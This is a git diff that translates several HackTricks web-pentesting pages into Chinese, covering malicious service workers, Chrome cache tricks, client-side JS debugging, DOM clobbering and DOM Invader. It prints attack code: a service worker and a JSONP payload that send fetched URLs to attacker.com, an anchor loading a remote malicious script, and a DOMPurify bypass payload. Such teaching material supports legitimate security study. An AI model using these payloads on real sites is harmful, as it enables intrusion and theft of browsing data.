-- A **vulnerable JSONP request** where you can **manipulate the output (with arbitrary JS code)** and a **XSS** to **load the JSONP with a payload** that will **load a malicious service worker**.
-
-In the following example I'm going to present a code to **register a new service worke**r that will listen to the `fetch` event and will **send to the attackers server each fetched URL** (this is the code you would need to **upload** to the **server** or load via a **vulnerable JSONP** response):
+- 一种**上传任意 JS** 文件到服务器的方法，以及一个**XSS 来加载上传的 JS 文件的服务工作者**
+- 一个**脆弱的 JSONP 请求**，您可以**操纵输出（使用任意 JS 代码）**，以及一个**XSS**来**加载带有有效负载的 JSONP**，该有效负载将**加载恶意服务工作者**。
 
+在以下示例中，我将展示一个代码来**注册一个新的服务工作者**，该服务工作者将监听`fetch`事件，并将**每个获取的 URL 发送到攻击者的服务器**（这是您需要**上传**到**服务器**或通过**脆弱的 JSONP** 响应加载的代码）：
 ```javascript
 self.addEventListener('fetch', function(e) {
-  e.respondWith(caches.match(e.request).then(function(response) {
-    fetch('https://attacker.com/fetch_url/' + e.request.url)
+e.respondWith(caches.match(e.request).then(function(response) {
+fetch('https://attacker.com/fetch_url/' + e.request.url)
 });
 ```
-
-And this is the code that will **register the worker** (the code you should be able to execute abusing a **XSS**). In this case a **GET** request will be sent to the **attackers** server **notifying** if the **registration** of the service worker was successful or not:
-
+这是将**注册工作者**的代码（您应该能够通过利用**XSS**执行的代码）。在这种情况下，将向**攻击者**的服务器发送**GET**请求，**通知**服务工作者的**注册**是否成功：
 ```javascript
 <script>
 window.addEventListener('load', function() {
 var sw = "/uploaded/ws_js.js";
 navigator.serviceWorker.register(sw, {scope: '/'})
-  .then(function(registration) {
-    var xhttp2 = new XMLHttpRequest();
-    xhttp2.open("GET", "https://attacker.com/SW/success", true);
-    xhttp2.send();
-  }, function (err) {
-    var xhttp2 = new XMLHttpRequest();
-    xhttp2.open("GET", "https://attacker.com/SW/error", true);
-    xhttp2.send();
-  });
+.then(function(registration) {
+var xhttp2 = new XMLHttpRequest();
+xhttp2.open("GET", "https://attacker.com/SW/success", true);
+xhttp2.send();
+}, function (err) {
+var xhttp2 = new XMLHttpRequest();
+xhttp2.open("GET", "https://attacker.com/SW/error", true);
+xhttp2.send();
+});
 });
 </script>
 ```
-
-In case of abusing a vulnerable JSONP endpoint you should put the value inside `var sw`. For example:
-
+在滥用易受攻击的 JSONP 端点时，您应该将值放入 `var sw` 中。例如：
 ```javascript
 var sw =
-  "/jsonp?callback=onfetch=function(e){ e.respondWith(caches.match(e.request).then(function(response){ fetch('https://attacker.com/fetch_url/' + e.request.url) }) )}//"
+"/jsonp?callback=onfetch=function(e){ e.respondWith(caches.match(e.request).then(function(response){ fetch('https://attacker.com/fetch_url/' + e.request.url) }) )}//"
 ```
+有一个专门用于**服务工作者**利用的**C2**，叫做[**Shadow Workers**](https://shadow-workers.github.io)，这将对利用这些漏洞非常有用。
 
-There is a **C2** dedicated to the **exploitation of Service Workers** called [**Shadow Workers**](https://shadow-workers.github.io) that will be very useful to abuse these vulnerabilities.
+**24小时缓存指令**将恶意或被攻陷的**服务工作者 (SW)** 的生命周期限制为在XSS漏洞修复后最多24小时，假设在线客户端状态。为了减少漏洞，网站运营商可以降低SW脚本的生存时间（TTL）。开发者还被建议创建一个[**服务工作者杀开关**](https://stackoverflow.com/questions/33986976/how-can-i-remove-a-buggy-service-worker-or-implement-a-kill-switch/38980776#38980776)以便快速停用。
 
-The **24-hour cache directive** limits the life of a malicious or compromised **service worker (SW)** to at most 24 hours after an XSS vulnerability fix, assuming online client status. To minimize vulnerability, site operators can lower the SW script's Time-To-Live (TTL). Developers are also advised to create a [**service worker kill-switch**](https://stackoverflow.com/questions/33986976/how-can-i-remove-a-buggy-service-worker-or-implement-a-kill-switch/38980776#38980776) for rapid deactivation.
+## 通过DOM Clobbering在SW中滥用`importScripts`
 
-## Abusing `importScripts` in a SW via DOM Clobbering
+从服务工作者调用的函数**`importScripts`**可以**从不同域导入脚本**。如果使用**攻击者可以修改的参数**调用此函数，他将能够**从他的域导入JS脚本**并获得XSS。
 
-The function **`importScripts`** called from a Service Worker can **import a script from a different domain**. If this function is called using a **parameter that an attacker could** modify he would be able to **import a JS script from his domain** and get XSS.
+**这甚至可以绕过CSP保护。**
 
-**This even bypasses CSP protections.**
-
-**Example vulnerable code:**
+**示例易受攻击的代码：**
 
 - **index.html**
-
 ```html
 <script>
-  navigator.serviceWorker.register(
-    "/dom-invader/testcases/augmented-dom-import-scripts/sw.js" +
-      location.search
-  )
-  // attacker controls location.search
+navigator.serviceWorker.register(
+"/dom-invader/testcases/augmented-dom-import-scripts/sw.js" +
+location.search
+)
+// attacker controls location.search
 </script>
 ```
-
 - **sw.js**
-
 ```javascript
 const searchParams = new URLSearchParams(location.search)
 let host = searchParams.get("host")
 self.importScripts(host + "/sw_extra.js")
 //host can be controllable by an attacker
 ```
+### 使用 DOM Clobbering
 
-### With DOM Clobbering
-
-For more info about what DOM Clobbering is check:
+有关 DOM Clobbering 的更多信息，请查看：
 
 {{#ref}}
 dom-clobbering.md
 {{#endref}}
 
-If the URL/domain where that the SW is using to call **`importScripts`** is **inside a HTML element**, it's **possible to modify it via DOM Clobbering** to make the SW **load a script from your own domain**.
+如果 SW 用于调用 **`importScripts`** 的 URL/域名 **在一个 HTML 元素内**，则 **可以通过 DOM Clobbering 修改它**，使 SW **从您自己的域加载脚本**。
 
-For an example of this check the reference link.
+有关此的示例，请查看参考链接。
 
-## References
+## 参考
 
 - [https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering](https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md b/src/pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md
index 3956e07e0..ab9ab096c 100644
--- a/src/pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md
+++ b/src/pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md
@@ -2,29 +2,28 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-More in depth details [**in this writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-spanote).
+更多详细信息 [**在这篇文章中**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-spanote)。
 
-The technique discussed here involves understanding the behavior and interaction of two primary cache types: the **back/forward cache (bfcache)** and the **disk cache**. The bfcache, which stores a complete snapshot of a page including the JavaScript heap, is prioritized over the disk cache for back/forward navigations due to its ability to store a more comprehensive snapshot. The disk cache, in contrast, stores resources fetched from the web without including the JavaScript heap, and is utilized for back/forward navigations to reduce communication costs. An interesting aspect of the disk cache is its inclusion of resources fetched using `fetch`, meaning accessed URL resources will be rendered by the browser from the cache.
+这里讨论的技术涉及理解两种主要缓存类型的行为和交互：**后退/前进缓存 (bfcache)** 和 **磁盘缓存**。bfcache 存储页面的完整快照，包括 JavaScript 堆，由于其能够存储更全面的快照，因此在后退/前进导航中优先于磁盘缓存。相比之下，磁盘缓存存储从网络获取的资源，但不包括 JavaScript 堆，并用于后退/前进导航以减少通信成本。磁盘缓存的一个有趣方面是它包括使用 `fetch` 获取的资源，这意味着访问的 URL 资源将由浏览器从缓存中呈现。
 
-### Key Points:
+### 关键点：
 
-- The **bfcache** has precedence over the disk cache in back/forward navigations.
-- To utilize a page stored in disk cache instead of bfcache, the latter must be disabled.
+- **bfcache** 在后退/前进导航中优先于磁盘缓存。
+- 要利用存储在磁盘缓存中的页面而不是 bfcache，必须禁用后者。
 
-### Disabling bfcache:
+### 禁用 bfcache：
 
-By default, Puppeteer disables bfcache, aligning with conditions listed in Chromium's documentation. One effective method to disable bfcache is through the use of `RelatedActiveContentsExist`, achieved by opening a page with `window.open()` that retains a reference to `window.opener`.
+默认情况下，Puppeteer 禁用 bfcache，符合 Chromium 文档中列出的条件。禁用 bfcache 的一种有效方法是通过使用 `RelatedActiveContentsExist`，通过使用 `window.open()` 打开一个保留对 `window.opener` 引用的页面来实现。
 
-### Reproducing the behavior:
+### 复制行为：
 
-1. Visit a webpage, e.g., `https://example.com`.
-2. Execute `open("http://spanote.seccon.games:3000/api/token")`, which results in a server response with a 500 status code.
-3. In the newly opened tab, navigate to `http://spanote.seccon.games:3000/`. This action caches the response of `http://spanote.seccon.games:3000/api/token` as a disk cache.
-4. Use `history.back()` to navigate back. The action results in the rendering of the cached JSON response on the page.
+1. 访问一个网页，例如 `https://example.com`。
+2. 执行 `open("http://spanote.seccon.games:3000/api/token")`，这将导致服务器响应 500 状态码。
+3. 在新打开的标签页中，导航到 `http://spanote.seccon.games:3000/`。此操作将 `http://spanote.seccon.games:3000/api/token` 的响应缓存为磁盘缓存。
+4. 使用 `history.back()` 返回。此操作将导致页面上呈现缓存的 JSON 响应。
 
-Verification that the disk cache was utilized can be confirmed through the use of DevTools in Google Chrome.
+可以通过在 Google Chrome 中使用 DevTools 确认磁盘缓存的使用。
 
-For further details on bfcache and disk cache, references can be found at [web.dev on bfcache](https://web.dev/i18n/en/bfcache/) and [Chromium's design documents on disk cache](https://www.chromium.org/developers/design-documents/network-stack/disk-cache/), respectively.
+有关 bfcache 和磁盘缓存的更多详细信息，可以参考 [web.dev 上的 bfcache](https://web.dev/i18n/en/bfcache/) 和 [Chromium 的磁盘缓存设计文档](https://www.chromium.org/developers/design-documents/network-stack/disk-cache/)。 
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md b/src/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md
index 51ac054c8..7a81bba01 100644
--- a/src/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md
+++ b/src/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md
@@ -1,33 +1,32 @@
-# Debugging Client Side JS
+# 调试客户端 JS
 
-## Debugging Client Side JS
+## 调试客户端 JS
 
 {{#include ../../banners/hacktricks-training.md}}
 
-Debugging client side JS can be a pain because every-time you change the URL (including a change in the params used or param values) you need to **reset the breakpoint and reload the page**.
+调试客户端 JS 可能很麻烦，因为每次你更改 URL（包括参数或参数值的更改）时，你需要 **重置断点并重新加载页面**。
 
 ### `debugger;`
 
-If you place the line `debugger;` inside a JS file, when the **browser** executes the JS it will **stop** the **debugger** in that place. Therefore, one way to set constant breakpoints would be to **download all the files locally and change set breakpoints in the JS code**.
+如果你在 JS 文件中放置 `debugger;` 这一行，当 **浏览器** 执行 JS 时，它会在该位置 **停止** **调试器**。因此，设置常量断点的一种方法是 **将所有文件下载到本地并在 JS 代码中设置断点**。
 
-### Overrides
+### 覆盖
 
-Browser overrides allows to have a local copy of the code that is going to be executed and execute that one instead of the one from the remote server.\
-You can **access the overrides** in "Dev Tools" --> "Sources" --> "Overrides".
+浏览器覆盖允许你拥有即将执行的代码的本地副本，并执行该副本，而不是来自远程服务器的代码。\
+你可以在 "Dev Tools" --> "Sources" --> "Overrides" 中 **访问覆盖**。
 
-You need to **create a local empty folder to be used to store the overrides**, so just create a new local folder and set is as override in that page.
+你需要 **创建一个本地空文件夹来存储覆盖**，所以只需创建一个新的本地文件夹并在该页面中将其设置为覆盖。
 
-Then, in "Dev Tools" --> "Sources" **select the file** you want to override and with **right click select "Save for overrides"**.
+然后，在 "Dev Tools" --> "Sources" 中 **选择你想要覆盖的文件**，并 **右键选择 "Save for overrides"**。
 
 ![](<../../images/image (742).png>)
 
-This will **copy the JS file locally** and you will be able to **modify that copy in the browser**. So just add the **`debugger;`** command wherever you want, **save** the change and **reload** the page, and every-time you access that web page **your local JS copy is going to be loaded** and your debugger command maintained in its place:
+这将 **在本地复制 JS 文件**，你将能够 **在浏览器中修改该副本**。所以只需在你想要的地方添加 **`debugger;`** 命令，**保存** 更改并 **重新加载** 页面，每次你访问该网页时 **你的本地 JS 副本将被加载**，并且你的调试器命令将保持在其位置：
 
 ![](<../../images/image (594).png>)
 
-## References
+## 参考
 
 - [https://www.youtube.com/watch?v=BW\_-RCo9lo8\&t=1529s](https://www.youtube.com/watch?v=BW_-RCo9lo8&t=1529s)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xss-cross-site-scripting/dom-clobbering.md b/src/pentesting-web/xss-cross-site-scripting/dom-clobbering.md
index f96865080..920f2ae6b 100644
--- a/src/pentesting-web/xss-cross-site-scripting/dom-clobbering.md
+++ b/src/pentesting-web/xss-cross-site-scripting/dom-clobbering.md
@@ -2,146 +2,125 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## **Basics**
-
-It's possible to generate **global variables inside the JS context** with the attributes **`id`** and **`name`** in HTML tags.
+## **基础**
 
+在HTML标签中，可以使用属性 **`id`** 和 **`name`** 在JS上下文中生成 **全局变量**。
 ```html
 <form id="x"></form>
 <script>
-  console.log(typeof document.x) //[object HTMLFormElement]
+console.log(typeof document.x) //[object HTMLFormElement]
 </script>
 ```
+**只有**某些元素可以使用**name属性**来覆盖全局变量，它们是：`embed`、`form`、`iframe`、`image`、`img`和`object`。
 
-**Only** certain elements can use the **name attribute** to clobber globals, they are: `embed`, `form`, `iframe`, `image`, `img` and `object`.
-
-Interestingly, when you use a **form element** to **clobber** a variable, you will get the **`toString`** value of the element itself: `[object HTMLFormElement]` but with **anchor** the **`toString`** will be the anchor **`href`**. Therefore, if you clobber using the **`a`** tag, you can **control** the **value** when it's **treated as a string**:
-
+有趣的是，当你使用**form元素**来**覆盖**一个变量时，你将得到元素本身的**`toString`**值：`[object HTMLFormElement]`，但使用**anchor**时，**`toString`**将是锚点的**`href`**。因此，如果你使用**`a`**标签进行覆盖，你可以**控制**当它被**视为字符串**时的**值**：
 ```html
 <a href="controlled string" id="x"></a>
 <script>
-  console.log(x) //controlled string
+console.log(x) //controlled string
 </script>
 ```
+### 数组与属性
 
-### Arrays & Attributes
-
-It's also possible to **clobber an array** and **object attributes**:
-
+也可以**覆盖数组**和**对象属性**：
 ```html
 <a id="x">
-  <a id="x" name="y" href="controlled">
-    <script>
-      console.log(x[1]) //controlled
-      console.log(x.y) //controlled
-    </script></a
-  ></a
+<a id="x" name="y" href="controlled">
+<script>
+console.log(x[1]) //controlled
+console.log(x.y) //controlled
+</script></a
+></a
 >
 ```
-
-To clobber **a 3rd attribute** (e.g. x.y.z), you need to use a **`form`**:
-
+要覆盖 **第三个属性** (例如 x.y.z)，您需要使用 **`form`**：
 ```html
 <form id="x" name="y"><input id="z" value="controlled" /></form>
 <form id="x"></form>
 <script>
-  alert(x.y.z.value) //controlled
+alert(x.y.z.value) //controlled
 </script>
 ```
-
-Clobbering more attributes is **more complicated but still possible**, using iframes:
-
+使用 iframes 来覆盖更多属性是 **更复杂但仍然可能** 的：
 ```html
 <iframe name="x" srcdoc="<a id=y href=controlled></a>"></iframe>
 <style>
-  @import "https://google.com";
+@import "https://google.com";
 </style>
 <script>
-  alert(x.y) //controlled
+alert(x.y) //controlled
 </script>
 ```
-
 > [!WARNING]
-> The style tag is used to **give enough time to the iframe to render**. Without it you will find an alert of **undefined**.
-
-To clobber deeper attributes, you can use **iframes with html encoding** this way:
+> style标签用于**给iframe足够的渲染时间**。没有它，你会发现一个**未定义**的警告。
 
+要更深入地覆盖属性，可以使用**带有HTML编码的iframes**，方法如下：
 ```html
 <iframe
-  name="a"
-  srcdoc="<iframe srcdoc='<iframe name=c srcdoc=<a/id=d&amp;amp;#x20;name=e&amp;amp;#x20;href=\controlled&amp;amp;gt;<a&amp;amp;#x20;id=d&amp;amp;gt; name=d>' name=b>"></iframe>
+name="a"
+srcdoc="<iframe srcdoc='<iframe name=c srcdoc=<a/id=d&amp;amp;#x20;name=e&amp;amp;#x20;href=\controlled&amp;amp;gt;<a&amp;amp;#x20;id=d&amp;amp;gt; name=d>' name=b>"></iframe>
 <style>
-  @import "https://google.com";
+@import "https://google.com";
 </style>
 <script>
-  alert(a.b.c.d.e) //controlled
+alert(a.b.c.d.e) //controlled
 </script>
 ```
+### **过滤器绕过**
 
-### **Filter Bypassing**
-
-If a filter is **looping** through the **properties** of a node using something like `document.getElementByID('x').attributes` you could **clobber** the attribute **`.attributes`** and **break the filter**. Other DOM properties like **`tagName`** , **`nodeName`** or **`parentNode`** and more are also **clobberable**.
-
+如果一个过滤器正在使用类似 `document.getElementByID('x').attributes` 的方式 **循环** 通过一个节点的 **属性**，你可以 **覆盖** 属性 **`.attributes`** 并 **破坏过滤器**。其他 DOM 属性如 **`tagName`**、**`nodeName`** 或 **`parentNode`** 等也可以被 **覆盖**。
 ```html
 <form id="x"></form>
 <form id="y">
-  <input name="nodeName" />
+<input name="nodeName" />
 </form>
 <script>
-  console.log(document.getElementById("x").nodeName) //FORM
-  console.log(document.getElementById("y").nodeName) //[object HTMLInputElement]
+console.log(document.getElementById("x").nodeName) //FORM
+console.log(document.getElementById("y").nodeName) //[object HTMLInputElement]
 </script>
 ```
+## **覆盖 `window.someObject`**
 
-## **Clobbering `window.someObject`**
-
-In JavaScript it's common to find:
-
+在 JavaScript 中，常常会发现：
 ```javascript
 var someObject = window.someObject || {}
 ```
-
-Manipulating HTML on the page allows overriding `someObject` with a DOM node, potentially introducing security vulnerabilities. For example, you can replace `someObject` with an anchor element pointing to a malicious script:
-
+在页面上操纵 HTML 允许用 DOM 节点覆盖 `someObject`，这可能引入安全漏洞。例如，您可以用指向恶意脚本的锚元素替换 `someObject`：
 ```html
 <a id=someObject href=//malicious-website.com/malicious.js></a>
 ```
-
-In a vulnerable code such as:
-
+在一个易受攻击的代码中，例如：
 ```html
 <script>
-  window.onload = function () {
-    let someObject = window.someObject || {}
-    let script = document.createElement("script")
-    script.src = someObject.url
-    document.body.appendChild(script)
-  }
+window.onload = function () {
+let someObject = window.someObject || {}
+let script = document.createElement("script")
+script.src = someObject.url
+document.body.appendChild(script)
+}
 </script>
 ```
+此方法利用脚本源执行不必要的代码。
 
-This method exploits the script source to execute unwanted code.
+**技巧**：**`DOMPurify`** 允许您使用 **`cid:`** 协议，该协议 **不对双引号进行 URL 编码**。这意味着您可以 **注入一个在运行时会被解码的编码双引号**。因此，注入类似 **`<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">`** 的内容将使 HTML 编码的 `&quot;` 在 **运行时被解码** 并 **逃逸** 出属性值以 **创建** **`onerror`** 事件。
 
-**Trick**: **`DOMPurify`** allows you to use the **`cid:`** protocol, which **does not URL-encode double-quotes**. This means you can **inject an encoded double-quote that will be decoded at runtime**. Therefore, injecting something like **`<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">`** will make the HTML encoded `&quot;` to be **decoded on runtime** and **escape** from the attribute value to **create** the **`onerror`** event.
+另一种技术使用 **`form`** 元素。某些客户端库检查新创建的表单元素的属性以进行清理。然而，通过在表单内添加一个 `input`，其 `id=attributes`，您有效地覆盖了属性属性，防止清理器访问实际属性。
 
-Another technique uses a **`form`** element. Certain client-side libraries inspect the attributes of a newly created form element to clean them. However, by adding an `input` with `id=attributes` inside the form, you effectively overwrite the attributes property, preventing the sanitizer from accessing the actual attributes.
+您可以 [**在此 CTF 写作中找到此类覆盖的示例**](iframes-in-xss-and-csp.md#iframes-in-sop-2)。
 
-You can [**find an example of this type of clobbering in this CTF writeup**](iframes-in-xss-and-csp.md#iframes-in-sop-2).
+## 覆盖文档对象
 
-## Clobbering document object
+根据文档，可以使用 DOM Clobbering 覆盖文档对象的属性：
 
-According to the documentation it's possible to overwrite attributes of the document object using DOM Clobbering:
-
-> The [Document](https://html.spec.whatwg.org/multipage/dom.html#document) interface [supports named properties](https://webidl.spec.whatwg.org/#dfn-support-named-properties). The [supported property names](https://webidl.spec.whatwg.org/#dfn-supported-property-names) of a [Document](https://html.spec.whatwg.org/multipage/dom.html#document) object document at any moment consist of the following, in [tree order](https://dom.spec.whatwg.org/#concept-tree-order) according to the element that contributed them, ignoring later duplicates, and with values from [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) attributes coming before values from name attributes when the same element contributes both:
+> [Document](https://html.spec.whatwg.org/multipage/dom.html#document) 接口 [支持命名属性](https://webidl.spec.whatwg.org/#dfn-support-named-properties)。任何时刻 [Document](https://html.spec.whatwg.org/multipage/dom.html#document) 对象的 [支持的属性名称](https://webidl.spec.whatwg.org/#dfn-supported-property-names) 由以下内容组成，按照 [树顺序](https://dom.spec.whatwg.org/#concept-tree-order) 根据贡献它们的元素，忽略后来的重复，并且来自 [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) 属性的值在同一元素同时贡献两者时排在名称属性的值之前：
 >
-> \- The value of the name content attribute for all [exposed](https://html.spec.whatwg.org/multipage/dom.html#exposed) [embed](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-embed-element), [form](https://html.spec.whatwg.org/multipage/forms.html#the-form-element), [iframe](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-iframe-element), [img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element), and [exposed](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element) elements that have a non-empty name content attribute and are [in a document tree](https://dom.spec.whatwg.org/#in-a-document-tree) with document as their [root](https://dom.spec.whatwg.org/#concept-tree-root);\
+> \- 所有具有非空名称内容属性并且在以文档为 [根](https://dom.spec.whatwg.org/#concept-tree-root) 的 [文档树](https://dom.spec.whatwg.org/#in-a-document-tree) 中的所有 [exposed](https://html.spec.whatwg.org/multipage/dom.html#exposed) [embed](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-embed-element)、[form](https://html.spec.whatwg.org/multipage/forms.html#the-form-element)、[iframe](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-iframe-element)、[img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element) 和 [exposed](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element) 元素的名称内容属性的值；\
 > \
-> \- The value of the [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) content attribute for all [exposed](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element) elements that have a non-empty [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) content attribute and are [in a document tree](https://dom.spec.whatwg.org/#in-a-document-tree) with document as their [root](https://dom.spec.whatwg.org/#concept-tree-root);\
+> \- 所有具有非空 [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) 内容属性并且在以文档为 [根](https://dom.spec.whatwg.org/#concept-tree-root) 的 [文档树](https://dom.spec.whatwg.org/#in-a-document-tree) 中的所有 [exposed](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element) 元素的 [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) 内容属性的值；\
 > \
-> \- The value of the [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) content attribute for all [img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element) elements that have both a non-empty [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) content attribute and a non-empty name content attribute, and are [in a document tree](https://dom.spec.whatwg.org/#in-a-document-tree) with document as their [root](https://dom.spec.whatwg.org/#concept-tree-root).
-
-Using this technique you can overwrite commonly used **values such as `document.cookie`, `document.body`, `document.children`**, and even methods in the Document interface like `document.querySelector`.
+> \- 所有同时具有非空 [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) 内容属性和非空名称内容属性，并且在以文档为 [根](https://dom.spec.whatwg.org/#concept-tree-root) 的 [文档树](https://dom.spec.whatwg.org/#in-a-document-tree) 中的所有 [img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element) 元素的 [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) 内容属性的值。
 
+使用此技术，您可以覆盖常用的 **值，例如 `document.cookie`、`document.body`、`document.children`**，甚至文档接口中的方法，如 `document.querySelector`。
 ```javascript
 document.write("<img name=cookie />")
 
@@ -160,93 +139,81 @@ HTMLCollection(2) [img, form, cookie: img]
 typeof(document.cookie)
 'object
 ```
+## 在被覆盖的元素后写入
 
-## Writing after the element clobbered
-
-The results of calls to **`document.getElementById()`** and **`document.querySelector()`** can be altered by injecting a `<html>` or `<body>` tag with an identical id attribute. Here's how it can be done:
-
+通过注入具有相同 id 属性的 `<html>` 或 `<body>` 标签，可以更改对 **`document.getElementById()`** 和 **`document.querySelector()`** 的调用结果。以下是实现方法：
 ```html
 <div style="display:none" id="cdnDomain" class="x">test</div>
 <p>
-  <html id="cdnDomain" class="x">
-    clobbered
-  </html>
-  <script>
-    alert(document.getElementById("cdnDomain").innerText) // Clobbered
-    alert(document.querySelector(".x").innerText) // Clobbered
-  </script>
+<html id="cdnDomain" class="x">
+clobbered
+</html>
+<script>
+alert(document.getElementById("cdnDomain").innerText) // Clobbered
+alert(document.querySelector(".x").innerText) // Clobbered
+</script>
 </p>
 ```
-
-Furthermore, by employing styles to hide these injected HTML/body tags, interference from other text in the `innerText` can be prevented, thus enhancing the efficacy of the attack:
-
+此外，通过使用样式隐藏这些注入的 HTML/body 标签，可以防止 `innerText` 中其他文本的干扰，从而增强攻击的有效性：
 ```html
 <div style="display:none" id="cdnDomain">test</div>
 <p>existing text</p>
 <html id="cdnDomain">
-  clobbered
+clobbered
 </html>
 <style>
-  p {
-    display: none;
-  }
+p {
+display: none;
+}
 </style>
 <script>
-  alert(document.getElementById("cdnDomain").innerText) // Clobbered
+alert(document.getElementById("cdnDomain").innerText) // Clobbered
 </script>
 ```
-
-Investigations into SVG revealed that a `<body>` tag can also be utilized effectively:
-
+对SVG的调查显示，`<body>`标签也可以有效地使用：
 ```html
 <div style="display:none" id="cdnDomain">example.com</div>
 <svg>
-  <body id="cdnDomain">
-    clobbered
-  </body>
+<body id="cdnDomain">
+clobbered
+</body>
 </svg>
 <script>
-  alert(document.getElementById("cdnDomain").innerText) // Clobbered
+alert(document.getElementById("cdnDomain").innerText) // Clobbered
 </script>
 ```
-
-For the HTML tag to function within SVG in browsers like Chrome and Firefox, a `<foreignobject>` tag is necessary:
-
+为了使 HTML 标签在 Chrome 和 Firefox 等浏览器中的 SVG 中正常工作，必须使用 `<foreignobject>` 标签：
 ```html
 <div style="display:none" id="cdnDomain">example.com</div>
 <svg>
-  <foreignobject>
-    <html id="cdnDomain">
-      clobbered
-    </html>
-  </foreignobject>
+<foreignobject>
+<html id="cdnDomain">
+clobbered
+</html>
+</foreignobject>
 </svg>
 <script>
-  alert(document.getElementById("cdnDomain").innerText) // Clobbered
+alert(document.getElementById("cdnDomain").innerText) // Clobbered
 </script>
 ```
-
 ## Clobbering Forms
 
-It's possible to add **new entries inside a form** just by **specifying the `form` attribute** inside some tags. You can use this to **add new values inside a form** and to even add a new **button** to **send it** (clickjacking or abusing some `.click()` JS code):
-
+只需在某些标签中指定 `form` 属性，就可以在表单中添加 **新条目**。您可以利用这一点在表单中 **添加新值**，甚至添加一个新的 **按钮** 来 **发送它**（点击劫持或滥用某些 `.click()` JS 代码）：
 ```html
 <!--Add a new attribute and a new button to send-->
 <textarea form="id-other-form" name="info">
 ";alert(1);//
 </textarea>
 <button form="id-other-form" type="submit" formaction="/edit" formmethod="post">
-  Click to send!
+Click to send!
 </button>
 ```
+- 有关更多表单属性，请查看 [**按钮检查此处**](https://www.w3schools.com/tags/tag_button.asp)**。**
 
-- For more form attributes in [**button check this**](https://www.w3schools.com/tags/tag_button.asp)**.**
-
-## References
+## 参考文献
 
 - [https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering](https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering)
 - [https://portswigger.net/web-security/dom-based/dom-clobbering](https://portswigger.net/web-security/dom-based/dom-clobbering)
 - Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker.
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xss-cross-site-scripting/dom-invader.md b/src/pentesting-web/xss-cross-site-scripting/dom-invader.md
index c2163fd75..508e2048b 100644
--- a/src/pentesting-web/xss-cross-site-scripting/dom-invader.md
+++ b/src/pentesting-web/xss-cross-site-scripting/dom-invader.md
@@ -4,82 +4,80 @@
 
 ## DOM Invader
 
-DOM Invader is a browser tool installed in Burp's inbuilt browser. It assists in **detecting DOM XSS vulnerabilities** using various sources and sinks, including web messages and prototype pollution. The tool is preinstalled as an extension.
+DOM Invader 是一个安装在 Burp 内置浏览器中的浏览器工具。它通过各种源和接收器，包括网络消息和原型污染，帮助 **检测 DOM XSS 漏洞**。该工具作为扩展预安装。
 
-DOM Invader integrates a tab within the browser's DevTools panel enabling the following:
+DOM Invader 在浏览器的 DevTools 面板中集成了一个选项卡，支持以下功能：
 
-1. **Identification of controllable sinks** on a webpage for DOM XSS testing, providing context and sanitization details.
-2. **Logging, editing, and resending web messages** sent via the `postMessage()` method for DOM XSS testing. DOM Invader can also auto-detect vulnerabilities using specially crafted web messages.
-3. Detection of **client-side prototype pollution** sources and scanning of controllable gadgets sent to risky sinks.
-4. Identification of **DOM clobbering vulnerabilities**.
+1. **识别网页上可控的接收器** 以进行 DOM XSS 测试，提供上下文和清理细节。
+2. **记录、编辑和重新发送通过 `postMessage()` 方法发送的网络消息** 以进行 DOM XSS 测试。DOM Invader 还可以使用特别构造的网络消息自动检测漏洞。
+3. 检测 **客户端原型污染** 源并扫描发送到风险接收器的可控小工具。
+4. 识别 **DOM clobbering 漏洞**。
 
-### Enable It
+### 启用它
 
-In the Burp's builtin browser go to the **Burp extension** and enable it:
+在 Burp 的内置浏览器中，转到 **Burp 扩展** 并启用它：
 
